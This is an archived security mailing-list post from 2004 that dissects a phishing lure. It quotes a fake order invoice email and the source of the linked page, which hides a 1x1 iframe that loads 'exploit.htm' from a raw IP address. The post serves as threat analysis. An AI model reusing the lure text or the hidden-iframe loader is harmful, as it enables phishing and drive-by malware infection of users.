Dailydave mailing list archives
Interesting hack attempt!
From: Dave Aitel <dave () immunitysec com>
Date: Thu, 13 May 2004 12:00:40 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Someone sent me a message: Thank you for shopping with BuyHYQ. Please keep this email invoice for your records. On May, 12 2004 we shipped your order number 91782656 for the following item: INV. NO. H139-22192 1 S452-2700 Syntax Olevia 27" WXGA LCD TV $1,399.99 To track the shipping status of your BuyHYQ order, visit our Order Status page at:http://www.bhyq.net/billing/orderstatus.php?91782656 $1,399.99 Has Been Charged To Your VISA Account.
I was bored, so I clicked on the obvious hack attempt (I don't even own a VISA) and Mozilla promptly took up all the memory on my system. ... brk(0) = 0x1b920000 brk(0x1b92d000) = 0x1b92d000 brk(0) = 0x1b92d000 brk(0x1b93d000) = 0x1b93d000 brk(0) = 0x1b93d000 brk(0x1b94a000) = 0x1b94a000 brk(0) = 0x1b94a000 brk(0x1b94d000) = 0x1b94d000 brk(0) = 0x1b94d000 ... [dave@localhost CANVAS]$ lynx --source http://www.bhyq.net/billing/orderstatus.php?91782651 <html> <head> <title>BuyHYQ Order Status Page</title> <META HTTP-EQUIV="Content-Language" CONTENT="EN"> <meta http-equiv="Refresh" content="2; URL=http://www.bhyq.net/billing/status.html"> <META NAME="revisit-after" CONTENT="7 days"> <META NAME="robots" CONTENT="FOLLOW,INDEX"> </head> <BODY BGCOLOR=white color=black LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0> <IFRAME SRC="http://65.75.137.180/exploit.htm" WIDTH=1 HEIGHT=1 border=0></IFRAME> <!-- Hacked by TNT Team --> <center> Loading your order info, please wait... </center> </body> </html> The exploit is missing now, but it was interesting to see! Way to go guys! - -dave -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAo5uozOrqAtg8JS8RAl0sAJ9iH9vChnfQGX0nRBwkO4RuskfANQCbB1Ze mKBtD3ebLp7mMSG6KV1OfZM= =PeH5 -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://www.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Interesting hack attempt! Dave Aitel (May 13)